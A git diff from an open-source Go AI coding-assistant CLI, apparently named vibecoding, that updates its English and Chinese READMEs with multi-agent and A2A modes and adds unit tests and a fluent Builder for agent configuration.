 
@@ -220,6 +249,8 @@ Flags:
   -m, --model string       Model ID
   -M, --mode string        Mode (plan, agent, yolo)
   -t, --thinking string    Thinking level (off, minimal, low, medium, high, xhigh)
+      --multi-agent        Enable multi-agent tools and commands
+      --enable-a2a-master   Enable A2A master mode (remote agent dispatch)
   -c, --continue           Continue most recent session
   -r, --resume string      Resume session by ID or path
       --session string     Use specific session file or ID
@@ -270,23 +301,46 @@ make dist       # Build distribution packages (.deb, .tar.gz)
 vibecoding/
 ├── cmd/vibecoding/        # CLI entry point
 ├── internal/
+│   ├── a2a/               # A2A protocol server and master mode
+│   ├── acp/               # ACP / MCP integration
 │   ├── agent/             # Core agent loop
 │   ├── config/            # Configuration system
 │   ├── context/           # Context management and token estimation
 │   ├── contextfiles/      # Context file discovery (AGENTS.md, CLAUDE.md, etc.)
+│   ├── cron/              # Scheduled tasks for multi-agent workflows
+│   ├── gateway/           # OpenAI-compatible HTTP gateway
+│   ├── hermes/            # Messaging gateway (WeChat/Feishu/WebSocket)
+│   ├── mcp/               # MCP server integration
+│   ├── memory/            # Persistent memory (memory.md)
+│   ├── messaging/         # Messaging platform abstraction
 │   ├── platform/          # Cross-platform compatibility utilities
 │   ├── provider/          # LLM provider abstraction
+│   │   ├── factory/       # Shared provider/model construction
 │   │   ├── openai/        # OpenAI Chat Completions API
-│   │   └── anthropic/     # Anthropic Messages API
+│   │   ├── anthropic/     # Anthropic Messages API
+│   │   └── vendor*.go     # Vendor adapter registry and defaults
 │   ├── sandbox/           # Sandbox (bwrap) implementation
 │   ├── session/           # Session management (JSONL)
 │   ├── skills/            # Skills system
 │   ├── tools/             # Tool implementations
 │   ├── tui/               # Terminal UI (BubbleTea)
-│   └── ua/                # User-Agent string generation
+│   ├── ua/                # User-Agent string generation
+│   └── vendored/          # Embedded binaries (rg, fd)
 └── pkg/sdk/               # Public SDK interface
 ```
 
+### Running Modes
+
+```
+vibecoding                    # Interactive terminal (TUI)
+vibecoding -p "..."           # Non-interactive print mode
+vibecoding acp                # ACP stdio agent (editor integration)
+vibecoding gateway            # OpenAI-compatible HTTP gateway
+vibecoding hermes             # Messaging gateway (WeChat/Feishu/WebSocket)
+vibecoding a2a start          # A2A protocol server (standalone)
+vibecoding --enable-a2a-master  # A2A master mode (remote agent dispatch)
+```
+
 ## License
 
 MIT
diff --git a/README_zh.md b/README_zh.md
index 780781e..f3a5226 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -8,11 +8,26 @@
   一个基于终端的 AI 编码助手，使用约 10,000 行 Go 代码编写，灵感来源于 <a href="https://pi.dev">pi.dev</a>
 </p>
 
+<p align="center">
+  主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，无需重复搭建部署 Claude Code 、 codex、Claw、Hermes 环境。
+</p>
+
+<p align="center">
+  <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
+  <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
+  <a href="https://goreportcard.com/report/github.com/startvibecoding/vibecoding"><img src="https://goreportcard.com/badge/github.com/startvibecoding/vibecoding" alt="Go Report Card"></a>
+  <a href="https://pkg.go.dev/github.com/startvibecoding/vibecoding"><img src="https://pkg.go.dev/badge/github.com/startvibecoding/vibecoding?status.svg" alt="GoDoc"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/network/dependencies"><img src="https://img.shields.io/librariesio/release/github/startvibecoding/vibecoding" alt="Dependencies"></a>
+</p>
+
 ## 功能特性
 
-- **多提供商支持**：DeepSeek（默认）、OpenAI、Anthropic，以及任何通过 OpenAI/Anthropic 兼容 API 的自定义提供商
+- **多提供商支持**：DeepSeek（默认）、OpenAI、Anthropic，以及面向 OpenAI/Anthropic 格式兼容 API 的厂商适配器
 - **SSE 流式传输**：实时令牌流式传输，快速响应
 - **思考模式**：扩展思考/推理支持（DeepSeek 推理）
+- **多 Agent 工作流**：可选 `--multi-agent` 模式，支持委托子 Agent 和 cron 命令入口
+- **A2A Master 模式**：可选 `--enable-a2a-master` 模式，通过 `a2a-list.json` 管理多个远程 A2A Agent，注册 `a2a_dispatch` tool 自动分发任务
 - **三种模式**：
   - 🗒️ **计划** — 只读分析和规划。沙箱化，无文件写入
   - 🔧 **代理**（默认）— 对项目的受控读写访问。Bash 需要批准（可配置白名单）。沙箱化，无网络
@@ -95,7 +110,12 @@ export DEEPSEEK_API_KEY=sk-...
 ```json
 {
   "providers": {
-    "deepseek-openai": { "apiKey": "sk-..." }
+    "deepseek-openai": {
+      "vendor": "deepseek",
+      "api": "openai-chat",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "sk-..."
+    }
   }
 }
 ```
@@ -115,6 +135,9 @@ vibecoding -p "用 Go 写一个 hello world"
 # 指定提供商和模型
 vibecoding --provider deepseek-openai --model deepseek-v4-flash
 
+# 启用子 Agent 工具和多 Agent 命令
+vibecoding --multi-agent
+
 # 更改模式
 vibecoding --mode plan    # 只读规划
 vibecoding --mode agent   # 标准模式（默认）
@@ -147,6 +170,7 @@ vibecoding --no-sandbox
   "defaultModel": "deepseek-v4-flash",
   "defaultThinkingLevel": "medium",
   "defaultMode": "agent",
+  "enablePlanTool": true,
   "maxContextTokens": 1000000,
   "maxOutputTokens": 384000,
   "compaction": {
@@ -185,6 +209,7 @@ vibecoding --no-sandbox
 | `VIBECODING_MODE` | 覆盖默认模式 |
 | `VIBECODING_THINKING` | 覆盖默认思考级别 |
 | `VIBECODING_USER_AGENT` | 自定义用户代理字符串 |
+| `VIBECODING_DEBUG` | 启用 provider 级请求/响应调试输出 |
 
 ## 沙箱安全
 
@@ -220,6 +245,8 @@ vibecoding [标志] [消息...]
   -m, --model string       模型 ID
   -M, --mode string        模式 (plan, agent, yolo)
   -t, --thinking string    思考级别 (off, minimal, low, medium, high, xhigh)
+      --multi-agent        启用多 Agent 工具和命令
+      --enable-a2a-master   启用 A2A Master 模式（远程 agent 调度）
   -c, --continue           继续最近会话
   -r, --resume string      通过 ID 或路径恢复会话
       --session string     使用特定会话文件或 ID
@@ -270,23 +297,46 @@ make dist       # 构建分发包 (.deb, .tar.gz)
 vibecoding/
 ├── cmd/vibecoding/        # CLI 入口点
 ├── internal/
-│   ├── agent/             # 核心代理循环
+│   ├── a2a/               # A2A 协议服务器与 Master 模式
+│   ├── acp/               # ACP / MCP 集成
+│   ├── agent/             # 核心 Agent 循环
 │   ├── config/            # 配置系统
 │   ├── context/           # 上下文管理和令牌估算
 │   ├── contextfiles/      # 上下文文件发现 (AGENTS.md, CLAUDE.md 等)
+│   ├── cron/              # 多 Agent 工作流的定时任务
+│   ├── gateway/           # OpenAI 兼容 HTTP 网关
+│   ├── hermes/            # 消息平台网关 (微信/飞书/WebSocket)
+│   ├── mcp/               # MCP 服务器集成
+│   ├── memory/            # 持久化记忆 (memory.md)
+│   ├── messaging/         # 消息平台抽象
 │   ├── platform/          # 跨平台兼容性工具
 │   ├── provider/          # LLM 提供商抽象
+│   │   ├── factory/       # 共享 provider/model 创建逻辑
 │   │   ├── openai/        # OpenAI Chat Completions API
-│   │   └── anthropic/     # Anthropic Messages API
+│   │   ├── anthropic/     # Anthropic Messages API
+│   │   └── vendor*.go     # 厂商适配注册和默认值
 │   ├── sandbox/           # 沙箱 (bwrap) 实现
 │   ├── session/           # 会话管理 (JSONL)
 │   ├── skills/            # 技能系统
 │   ├── tools/             # 工具实现
 │   ├── tui/               # 终端界面 (BubbleTea)
-│   └── ua/                # 用户代理字符串生成
+│   ├── ua/                # 用户代理字符串生成
+│   └── vendored/          # 内嵌二进制 (rg, fd)
 └── pkg/sdk/               # 公共 SDK 接口
 ```
 
+### 运行模式
+
+```
+vibecoding                    # 交互式终端 (TUI)
+vibecoding -p "..."           # 非交互打印模式
+vibecoding acp                # ACP stdio 代理 (编辑器集成)
+vibecoding gateway            # OpenAI 兼容 HTTP 网关
+vibecoding hermes             # 消息平台网关 (微信/飞书/WebSocket)
+vibecoding a2a start          # A2A 协议服务器 (独立模式)
+vibecoding --enable-a2a-master  # A2A Master 模式 (远程 agent 调度)
+```
+
 ## 许可证
 
-MIT
\ No newline at end of file
+MIT
diff --git a/agent/agent_test.go b/agent/agent_test.go
new file mode 100644
index 0000000..49a7a1d
--- /dev/null
+++ b/agent/agent_test.go
@@ -0,0 +1,705 @@
+package agent
+
+import (
+	"context"
+	"testing"
+)
+
+// MockProvider is a mock implementation of Provider for testing.
+type MockProvider struct {
+	nameVal   string
+	modelsVal []ModelInfo
+	chatChan  chan StreamEvent
+}
+
+func NewMockProvider(name string, models []ModelInfo) *MockProvider {
+	return &MockProvider{
+		nameVal:   name,
+		modelsVal: models,
+		chatChan:  make(chan StreamEvent, 10),
+	}
+}
+
+func (m *MockProvider) Chat(ctx context.Context, params ChatParams) <-chan StreamEvent {
+	go func() {
+		defer close(m.chatChan)
+		m.chatChan <- StreamEvent{Type: StreamDone, StopReason: "stop"}
+	}()
+	return m.chatChan
+}
+
+func (m *MockProvider) Name() string {
+	return m.nameVal
+}
+
+func (m *MockProvider) Models() []ModelInfo {
+	return m.modelsVal
+}
+
+func (m *MockProvider) GetModel(id string) *ModelInfo {
+	for i := range m.modelsVal {
+		if m.modelsVal[i].ID == id {
+			return &m.modelsVal[i]
+		}
+	}
+	return nil
+}
+
+// ============ types.go tests ============
+
+func TestNewUserMessage(t *testing.T) {
+	msg := NewUserMessage("hello")
+	if msg.Role != RoleUser {
+		t.Errorf("expected role user, got %v", msg.Role)
+	}
+	if msg.Content != "hello" {
+		t.Errorf("expected content 'hello', got %q", msg.Content)
+	}
+}
+
+func TestNewAssistantTextMessage(t *testing.T) {
+	msg := NewAssistantTextMessage("response")
+	if msg.Role != RoleAssistant {
+		t.Errorf("expected role assistant, got %v", msg.Role)
+	}
+	if msg.Content != "response" {
+		t.Errorf("expected content 'response', got %q", msg.Content)
+	}
+}
+
+func TestNewAssistantMessage(t *testing.T) {
+	contents := []ContentBlock{
+		{Type: "text", Text: "hello"},
+		{Type: "thinking", Thinking: "let me think"},
+	}
+	msg := NewAssistantMessage(contents)
+	if msg.Role != RoleAssistant {
+		t.Errorf("expected role assistant, got %v", msg.Role)
+	}
+	if len(msg.Contents) != 2 {
+		t.Errorf("expected 2 contents, got %d", len(msg.Contents))
+	}
+}
+
+func TestNewToolResultMessage(t *testing.T) {
+	msg := NewToolResultMessage("call-123", "bash", "output", false)
+	if msg.Role != RoleToolResult {
+		t.Errorf("expected role toolResult, got %v", msg.Role)
+	}
+	if msg.ToolCallID != "call-123" {
+		t.Errorf("expected toolCallID 'call-123', got %q", msg.ToolCallID)
+	}
+	if msg.ToolName != "bash" {
+		t.Errorf("expected toolName 'bash', got %q", msg.ToolName)
+	}
+	if msg.Content != "output" {
+		t.Errorf("expected content 'output', got %q", msg.Content)
+	}
+	if msg.IsError {
+		t.Error("expected IsError to be false")
+	}
+}
+
+func TestNewToolResultMessageWithError(t *testing.T) {
+	msg := NewToolResultMessage("call-456", "read", "error occurred", true)
+	if !msg.IsError {
+		t.Error("expected IsError to be true")
+	}
+}
+
+func TestNewToolResultMessageWithContents(t *testing.T) {
+	contents := []ContentBlock{
+		{Type: "text", Text: "result"},
+	}
+	msg := NewToolResultMessageWithContents("call-789", "write", "done", contents, false)
+	if msg.Role != RoleToolResult {
+		t.Errorf("expected role toolResult, got %v", msg.Role)
+	}
+	if len(msg.Contents) != 1 {
+		t.Errorf("expected 1 content, got %d", len(msg.Contents))
+	}
+}
+
+func TestNewSystemInjectedUserMessage(t *testing.T) {
+	msg := NewSystemInjectedUserMessage("system prompt")
+	if msg.Role != RoleUser {
+		t.Errorf("expected role user, got %v", msg.Role)
+	}
+	if !msg.SystemInjected {
+		t.Error("expected SystemInjected to be true")
+	}
+}
+
+func TestUsageCalculateCost(t *testing.T) {
+	usage := &Usage{
+		InputTokens:  1000,
+		OutputTokens: 500,
+		CacheRead:    100,
+		CacheWrite:   50,
+	}
+
+	usage.CalculateCost(0.27, 1.10, 0.10, 0.27)
+
+	if usage.Cost.Input <= 0 {
+		t.Error("expected positive input cost")
+	}
+	if usage.Cost.Output <= 0 {
+		t.Error("expected positive output cost")
+	}
+	if usage.Cost.Total <= 0 {
+		t.Error("expected positive total cost")
+	}
+
+	expectedInput := 0.00027
+	if diff(usage.Cost.Input, expectedInput) > 0.0001 {
+		t.Errorf("expected input cost %.6f, got %.6f", expectedInput, usage.Cost.Input)
+	}
+}
+
+func TestRoleConstants(t *testing.T) {
+	if RoleUser != "user" {
+		t.Errorf("expected user, got %q", RoleUser)
+	}
+	if RoleAssistant != "assistant" {
+		t.Errorf("expected assistant, got %q", RoleAssistant)
+	}
+	if RoleToolResult != "toolResult" {
+		t.Errorf("expected toolResult, got %q", RoleToolResult)
+	}
+	if RoleSystem != "system" {
+		t.Errorf("expected system, got %q", RoleSystem)
+	}
+}
+
+func TestContextUsage(t *testing.T) {
+	usage := &ContextUsage{
+		Tokens:        50000,
+		ContextWindow: 128000,
+	}
+
+	percent := float64(50000) / float64(128000) * 100
+	usage.Percent = &percent
+
+	if usage.Percent == nil {
+		t.Error("expected Percent to be set")
+	}
+}
+
+// ============ builder.go tests ============
+
+func TestNewBuilder(t *testing.T) {
+	b := NewBuilder()
+
+	if b.mode != "agent" {
+		t.Errorf("expected mode 'agent', got %q", b.mode)
+	}
+	if b.thinkingLevel != ThinkingMedium {
+		t.Errorf("expected thinking level medium, got %v", b.thinkingLevel)
+	}
+	if b.maxTokens != 16384 {
+		t.Errorf("expected maxTokens 16384, got %d", b.maxTokens)
+	}
+	if b.maxIterations != 200 {
+		t.Errorf("expected maxIterations 200, got %d", b.maxIterations)
+	}
+	if b.toolExecutionMode != "parallel" {
+		t.Errorf("expected toolExecutionMode 'parallel', got %q", b.toolExecutionMode)
+	}
+	if !b.compactionEnabled {
+		t.Error("expected compactionEnabled to be true")
+	}
+	if b.compactionReserve != 16384 {
+		t.Errorf("expected compactionReserve 16384, got %d", b.compactionReserve)
+	}
+}
+
+func TestBuilderWithProvider(t *testing.T) {
+	b := NewBuilder()
+	provider := NewMockProvider("test", []ModelInfo{{ID: "gpt-4"}})
+
+	result := b.WithProvider(provider)
+
+	if result.provider != provider {
+		t.Error("provider not set correctly")
+	}
+	if result != b {
+		t.Error("WithProvider should return the same builder")
+	}
+}
+
+func TestBuilderWithModel(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithModel("gpt-4o")
+
+	if b.modelID != "gpt-4o" {
+		t.Errorf("expected modelID 'gpt-4o', got %q", b.modelID)
+	}
+	if result != b {
+		t.Error("WithModel should return the same builder")
+	}
+}
+
+func TestBuilderWithMode(t *testing.T) {
+	b := NewBuilder()
+	b.WithMode("plan")
+	if b.mode != "plan" {
+		t.Errorf("expected mode 'plan', got %q", b.mode)
+	}
+
+	b.WithMode("yolo")
+	if b.mode != "yolo" {
+		t.Errorf("expected mode 'yolo', got %q", b.mode)
+	}
+}
+
+func TestBuilderWithWorkDir(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithWorkDir("/tmp/project")
+
+	if b.workDir != "/tmp/project" {
+		t.Errorf("expected workDir '/tmp/project', got %q", b.workDir)
+	}
+	if result != b {
+		t.Error("WithWorkDir should return the same builder")
+	}
+}
+
+func TestBuilderWithThinkingLevel(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithThinkingLevel(ThinkingHigh)
+
+	if b.thinkingLevel != ThinkingHigh {
+		t.Errorf("expected thinkingLevel high, got %v", b.thinkingLevel)
+	}
+	if result != b {
+		t.Error("WithThinkingLevel should return the same builder")
+	}
+}
+
+func TestBuilderThinkingLevelConstants(t *testing.T) {
+	if ThinkingOff != "off" {
+		t.Errorf("expected off, got %q", ThinkingOff)
+	}
+	if ThinkingMinimal != "minimal" {
+		t.Errorf("expected minimal, got %q", ThinkingMinimal)
+	}
+	if ThinkingLow != "low" {
+		t.Errorf("expected low, got %q", ThinkingLow)
+	}
+	if ThinkingMedium != "medium" {
+		t.Errorf("expected medium, got %q", ThinkingMedium)
+	}
+	if ThinkingHigh != "high" {
+		t.Errorf("expected high, got %q", ThinkingHigh)
+	}
+	if ThinkingXHigh != "xhigh" {
+		t.Errorf("expected xhigh, got %q", ThinkingXHigh)
+	}
+}
+
+func TestBuilderWithMaxTokens(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithMaxTokens(8192)
+
+	if b.maxTokens != 8192 {
+		t.Errorf("expected maxTokens 8192, got %d", b.maxTokens)
+	}
+	if result != b {
+		t.Error("WithMaxTokens should return the same builder")
+	}
+}
+
+func TestBuilderWithSystemPromptExtra(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithSystemPromptExtra("extra context")
+
+	if b.systemPromptExtra != "extra context" {
+		t.Errorf("expected systemPromptExtra, got %q", b.systemPromptExtra)
+	}
+	if result != b {
+		t.Error("WithSystemPromptExtra should return the same builder")
+	}
+}
+
+func TestBuilderWithMaxIterations(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithMaxIterations(100)
+
+	if b.maxIterations != 100 {
+		t.Errorf("expected maxIterations 100, got %d", b.maxIterations)
+	}
+	if result != b {
+		t.Error("WithMaxIterations should return the same builder")
+	}
+}
+
+func TestBuilderWithToolExecutionMode(t *testing.T) {
+	b := NewBuilder()
+	b.WithToolExecutionMode("sequential")
+	if b.toolExecutionMode != "sequential" {
+		t.Errorf("expected sequential, got %q", b.toolExecutionMode)
+	}
+
+	b.WithToolExecutionMode("parallel")
+	if b.toolExecutionMode != "parallel" {
+		t.Errorf("expected parallel, got %q", b.toolExecutionMode)
+	}
+}
+
+func TestBuilderWithTools(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithTools([]string{"read", "write", "edit"})
+
+	if len(b.tools) != 3 {
+		t.Errorf("expected 3 tools, got %d", len(b.tools))
+	}
+	if b.tools[0] != "read" {
+		t.Errorf("expected first tool 'read', got %q", b.tools[0])
+	}
+	if result != b {
+		t.Error("WithTools should return the same builder")
+	}
+}
+
+func TestBuilderWithSandbox(t *testing.T) {
+	b := NewBuilder()
+
+	b.WithSandbox(true)
+	if !b.sandboxEnabled {
+		t.Error("expected sandboxEnabled to be true")
+	}
+
+	b.WithSandbox(false)
+	if b.sandboxEnabled {
+		t.Error("expected sandboxEnabled to be false")
+	}
+}
+
+func TestBuilderWithSessionDir(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithSessionDir("/tmp/sessions")
+
+	if b.sessionDir != "/tmp/sessions" {
+		t.Errorf("expected sessionDir '/tmp/sessions', got %q", b.sessionDir)
+	}
+	if result != b {
+		t.Error("WithSessionDir should return the same builder")
+	}
+}
+
+func TestBuilderWithCompaction(t *testing.T) {
+	b := NewBuilder()
+	result := b.WithCompaction(false, 8192)
+
+	if b.compactionEnabled {
+		t.Error("expected compactionEnabled to be false")
+	}
+	if b.compactionReserve != 8192 {
+		t.Errorf("expected compactionReserve 8192, got %d", b.compactionReserve)
+	}
+	if result != b {
+		t.Error("WithCompaction should return the same builder")
+	}
+}
+
+func TestBuilderWithMultiAgent(t *testing.T) {
+	b := NewBuilder()
+
+	b.WithMultiAgent(true)
+	if !b.multiAgent {
+		t.Error("expected multiAgent to be true")
+	}
+
+	b.WithMultiAgent(false)
+	if b.multiAgent {
+		t.Error("expected multiAgent to be false")
+	}
+}
+
+func TestBuilderWithApprovalHandler(t *testing.T) {
+	b := NewBuilder()
+	handler := func(toolCallID, toolName string, args map[string]any) bool {
+		return true
+	}
+
+	result := b.WithApprovalHandler(handler)
+
+	if b.approvalHandler == nil {
+		t.Error("expected approvalHandler to be set")
+	}
+
+	b.WithApprovalHandler(nil)
+	if b.approvalHandler != nil {
+		t.Error("expected approvalHandler to be nil")
+	}
+
+	_ = result
+}
+
+func TestBuilderConfig(t *testing.T) {
+	provider := NewMockProvider("test", []ModelInfo{{ID: "gpt-4"}})
+	b := NewBuilder().
+		WithProvider(provider).
+		WithModel("gpt-4").
+		WithMode("yolo").
+		WithWorkDir("/home/user/project").
+			WithThinkingLevel(ThinkingHigh).
+		WithMaxTokens(8192).
+		WithSystemPromptExtra("extra").
+		WithMaxIterations(100).
+		WithToolExecutionMode("sequential").
+		WithTools([]string{"read"}).
+		WithSandbox(true).
+		WithSessionDir("/tmp/sessions").
+		WithCompaction(false, 8192).
+		WithMultiAgent(true)
+
+	cfg := b.Config()
+
+	if cfg.Provider != provider {
+		t.Error("Provider not matched")
+	}
+	if cfg.ModelID != "gpt-4" {
+		t.Errorf("expected ModelID 'gpt-4', got %q", cfg.ModelID)
+	}
+	if cfg.Mode != "yolo" {
+		t.Errorf("expected Mode 'yolo', got %q", cfg.Mode)
+	}
+	if cfg.WorkDir != "/home/user/project" {
+		t.Errorf("expected WorkDir, got %q", cfg.WorkDir)
+	}
+	if cfg.ThinkingLevel != ThinkingHigh {
+		t.Errorf("expected ThinkingLevel high, got %v", cfg.ThinkingLevel)
+	}
+	if cfg.MaxTokens != 8192 {
+		t.Errorf("expected MaxTokens 8192, got %d", cfg.MaxTokens)
+	}
+	if cfg.SystemPromptExtra != "extra" {
+		t.Errorf("expected SystemPromptExtra, got %q", cfg.SystemPromptExtra)
+	}
+	if cfg.MaxIterations != 100 {
+		t.Errorf("expected MaxIterations 100, got %d", cfg.MaxIterations)
+	}
+	if cfg.ToolExecutionMode != "sequential" {
+		t.Errorf("expected ToolExecutionMode, got %q", cfg.ToolExecutionMode)
+	}
+	if len(cfg.Tools) != 1 || cfg.Tools[0] != "read" {
+		t.Error("Tools not matched")
+	}
+	if !cfg.SandboxEnabled {
+		t.Error("expected SandboxEnabled true")
+	}
+	if cfg.SessionDir != "/tmp/sessions" {
+		t.Errorf("expected SessionDir, got %q", cfg.SessionDir)
+	}
+	if cfg.CompactionEnabled {
+		t.Error("expected CompactionEnabled false")
+	}
+	if cfg.CompactionReserve != 8192 {
+		t.Errorf("expected CompactionReserve 8192, got %d", cfg.CompactionReserve)
+	}
+	if !cfg.MultiAgent {
+		t.Error("expected MultiAgent true")
+	}
+}
+
+func TestBuilderBuildRequiresProvider(t *testing.T) {
+	b := NewBuilder()
+	_, err := b.Build()
+
+	if err == nil {
+		t.Error("expected error when provider is nil")
+	}
+}
+
+func TestBuilderBuildRequiresModel(t *testing.T) {
+	provider := NewMockProvider("test", []ModelInfo{})
+	b := NewBuilder().WithProvider(provider)
+
+	_, err := b.Build()
+
+	if err == nil {
+		t.Error("expected error when no models available")
+	}
+}
+
+// ============ provider.go tests ============
+
+func TestBaseProviderName(t *testing.T) {
+	provider := NewBaseProvider("openai", []ModelInfo{{ID: "gpt-4"}})
+	if provider.Name() != "openai" {
+		t.Errorf("expected 'openai', got %q", provider.Name())
+	}
+}
+
+func TestBaseProviderModels(t *testing.T) {
+	models := []ModelInfo{
+		{ID: "gpt-4"},
+		{ID: "gpt-3.5-turbo"},
+	}
+	provider := NewBaseProvider("openai", models)
+
+	result := provider.Models()
+	if len(result) != 2 {
+		t.Errorf("expected 2 models, got %d", len(result))
+	}
+}
+
+func TestBaseProviderGetModel(t *testing.T) {
+	models := []ModelInfo{
+		{ID: "gpt-4", Name: "GPT-4"},
+		{ID: "gpt-3.5-turbo", Name: "GPT-3.5"},
+	}
+	provider := NewBaseProvider("openai", models)
+
+	model := provider.GetModel("gpt-4")
+	if model == nil {
+		t.Error("expected to find gpt-4")
+	}
+	if model.Name != "GPT-4" {
+		t.Errorf("expected name 'GPT-4', got %q", model.Name)
+	}
+
+	model = provider.GetModel("gpt-5")
+	if model != nil {
+		t.Error("expected nil for non-existing model")
+	}
+}
+
+func TestBoolPtr(t *testing.T) {
+	truePtr := BoolPtr(true)
+	if truePtr == nil || !*truePtr {
+		t.Error("expected true")
+	}
+
+	falsePtr := BoolPtr(false)
+	if falsePtr == nil || *falsePtr {
+		t.Error("expected false")
+	}
+}
+
+func TestVendorFromBaseURL(t *testing.T) {
+	tests := []struct {
+		url      string
+		expected string
+	}{
+		{"api.deepseek.com", "deepseek"},
+		{"https://api.deepseek.com/v1", "deepseek"},
+		{"api.xiaomimimo.com", "xiaomi"},
+		{"api.moonshot.cn", "kimi"},
+		{"api.minimax.chat", "minimax"},
+		{"ark.cn-beijing.volces.com", "seed"},
+		{"aip.baidubce.com", "qianfan"},
+		{"dashscope.aliyuncs.com", "bailian"},
+		{"ai.gitee.com", "gitee"},
+		{"openrouter.ai", "openrouter"},
+		{"api.together.xyz", "together"},
+		{"api.groq.com", "groq"},
+		{"api.fireworks.ai", "fireworks"},
+		{"unknown.api.com", ""},
+		{"", ""},
+	}
+
+	for _, tt := range tests {
+		result := VendorFromBaseURL(tt.url)
+		if result != tt.expected {
+			t.Errorf("for %q: expected %q, got %q", tt.url, tt.expected, result)
+		}
+	}
+}
+
+func TestThinkingLevelValues(t *testing.T) {
+	if string(ThinkingOff) != "off" {
+		t.Errorf("expected off, got %q", ThinkingOff)
+	}
+	if string(ThinkingMinimal) != "minimal" {
+		t.Errorf("expected minimal, got %q", ThinkingMinimal)
+	}
+	if string(ThinkingLow) != "low" {
+		t.Errorf("expected low, got %q", ThinkingLow)
+	}
+	if string(ThinkingMedium) != "medium" {
+		t.Errorf("expected medium, got %q", ThinkingMedium)
+	}
+	if string(ThinkingHigh) != "high" {
+		t.Errorf("expected high, got %q", ThinkingHigh)
+	}
+	if string(ThinkingXHigh) != "xhigh" {
+		t.Errorf("expected xhigh, got %q", ThinkingXHigh)
+	}
+}
+
+func TestStreamEventTypeValues(t *testing.T) {
+	if StreamStart != 0 {
+		t.Errorf("StreamStart should be 0, got %d", StreamStart)
+	}
+	if StreamTextDelta != 1 {
+		t.Errorf("StreamTextDelta should be 1, got %d", StreamTextDelta)
+	}
+	if StreamThinkDelta != 2 {
+		t.Errorf("StreamThinkDelta should be 2, got %d", StreamThinkDelta)
+	}
+	if StreamToolCall != 3 {
+		t.Errorf("StreamToolCall should be 3, got %d", StreamToolCall)
+	}
+	if StreamUsage != 4 {
+		t.Errorf("StreamUsage should be 4, got %d", StreamUsage)
+	}
+	if StreamDone != 5 {
+		t.Errorf("StreamDone should be 5, got %d", StreamDone)
+	}
+	if StreamError != 6 {
+		t.Errorf("StreamError should be 6, got %d", StreamError)
+	}
+}
+
+func TestModelInfo(t *testing.T) {
+	compat := &ModelCompat{
+		ThinkingFormat: "deepseek",
+	}
+
+	model := ModelInfo{
+		ID:            "deepseek-chat",
+		Name:          "DeepSeek Chat",
+		Provider:      "deepseek",
+		Reasoning:     true,
+		ContextWindow: 64000,
+		MaxTokens:     8192,
+		Compat:        compat,
+	}
+
+	if model.ID != "deepseek-chat" {
+		t.Errorf("expected ID, got %q", model.ID)
+	}
+	if model.Compat == nil {
+		t.Error("expected Compat to be set")
+	}
+	if model.Compat.ThinkingFormat != "deepseek" {
+		t.Errorf("expected thinking format, got %q", model.Compat.ThinkingFormat)
+	}
+}
+
+func TestModelCompatBoolPtrs(t *testing.T) {
+	trueVal := true
+	falseVal := false
+
+	compat := &ModelCompat{
+		SupportsDeveloperRole:   &trueVal,
+		SupportsStore:           &falseVal,
+		SupportsReasoningEffort: nil,
+	}
+
+	if compat.SupportsDeveloperRole == nil || !*compat.SupportsDeveloperRole {
+		t.Error("expected SupportsDeveloperRole to be true")
+	}
+	if compat.SupportsStore == nil || *compat.SupportsStore {
+		t.Error("expected SupportsStore to be false")
+	}
+}
+
+func diff(a, b float64) float64 {
+	if a > b {
+		return a - b
+	}
+	return b - a
+}
diff --git a/agent/builder.go b/agent/builder.go
new file mode 100644
index 0000000..df68d17
--- /dev/null
+++ b/agent/builder.go
@@ -0,0 +1,250 @@
+package agent
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+)
+
+// Builder provides a fluent API for creating Agent instances.
+// External developers use this to instantiate the built-in Agent without
+// depending on internal packages.
+//
+// Usage:
+//
+//	a, err := agent.NewBuilder().
+//	    WithProvider(myProvider).
+//	    WithModel("gpt-4").
+//	    WithMode("yolo").
+//	    WithWorkDir("/home/user/project").
+//	    Build()
+type Builder struct {
+	provider          Provider
+	modelID           string
+	mode              string
+	workDir           string
+	thinkingLevel     ThinkingLevel
+	maxTokens         int
+	systemPromptExtra string
+	maxIterations     int
+	toolExecutionMode string
+	tools             []string
+	sandboxEnabled    bool
+	sessionDir        string
+	compactionEnabled bool
+	compactionReserve int
+	multiAgent        bool
+	approvalHandler   func(toolCallID, toolName string, args map[string]any) bool
+}
+
+// NewBuilder creates a new Builder with sensible defaults.
+func NewBuilder() *Builder {
+	return &Builder{
+		mode:              "agent",
+		thinkingLevel:     ThinkingMedium,
+		maxTokens:         16384,
+		maxIterations:     200,
+		toolExecutionMode: "parallel",
+		compactionEnabled: true,
+		compactionReserve: 16384,
+	}
+}
+
+// WithProvider sets the LLM provider.
+func (b *Builder) WithProvider(p Provider) *Builder {
+	b.provider = p
+	return b
+}
+
+// WithModel sets the model ID.
+func (b *Builder) WithModel(modelID string) *Builder {
+	b.modelID = modelID
+	return b
+}
+
+// WithMode sets the agent mode: "plan", "agent", or "yolo".
+func (b *Builder) WithMode(mode string) *Builder {
+	b.mode = mode
+	return b
+}
+
+// WithWorkDir sets the working directory.
+func (b *Builder) WithWorkDir(dir string) *Builder {
+	b.workDir = dir
+	return b
+}
+
+// WithThinkingLevel sets the thinking/reasoning level.
+func (b *Builder) WithThinkingLevel(level ThinkingLevel) *Builder {
+	b.thinkingLevel = level
+	return b
+}
+
+// WithMaxTokens sets the maximum output tokens.
+func (b *Builder) WithMaxTokens(n int) *Builder {
+	b.maxTokens = n
+	return b
+}
+
